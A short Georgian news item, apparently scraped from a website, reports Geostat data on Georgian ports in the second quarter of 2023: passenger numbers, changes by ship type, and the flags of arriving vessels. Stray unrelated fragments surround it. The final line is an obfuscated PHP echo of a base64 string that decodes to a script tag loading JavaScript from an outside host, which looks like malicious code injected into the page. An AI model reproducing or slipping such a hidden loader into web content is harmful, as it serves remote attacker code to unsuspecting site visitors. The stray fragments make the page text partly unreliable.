celsiusi
ავერსი საქკაბელი

საქართველოს ნავსადგურები მიმდინარე წლის მეორე კვარტალში 1300 მგზავრს მოემსახურა. აღნიშნული მონაცემები საქსტატმა გამოაქვეყნა. სტატისტიკის თანახმად მეორე კვარტლის მაჩვენებლები 0.9%-ით ნაკლებია გასული წლის ანალოგიური პერიოდის მაჩვენებელზე. ამასთან, მგზავრთა ნაკადში შემოსული მგზავრების წილი მცირედით აღემატება გასული მგზავრების წილს და 52.6%-ს შეადგენს.

გარდა ამისა, საქსტატის მონაცემებით, 2023 წლის II კვარტალში, გასული წლის შესაბამის პერიოდთან შედარებით, საქართველოს ნავსადგურებმა და ტერმინალებმა 61.3%-ით მეტი კონტეინერმზიდი მიიღო, 3.4%-ით მეტი - თხევადი ტვირთმზიდი, 3.8%-ით ნაკლები - გენერალური (ზოგადი სახის) ტვირთმზიდი და 50%-ით ნაკლები - ნაყარი ტვირთმზიდი.

ამასთან, 2023 წლის II კვარტალში საქართველოს ნავსადგურებში და ტერმინალებში შემოსული გემების 20.6% თურქეთის დროშის ქვეშ დაცურავს, 13.7% - პანამის, 13.4% - ლიბერიის, 8.5% - მალტის, 6.2% - რუსეთის, 5.2%- ბულგარეთის, ხოლო 32.4% სხვა ქვეყნებზე ნაწილდება.

334
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");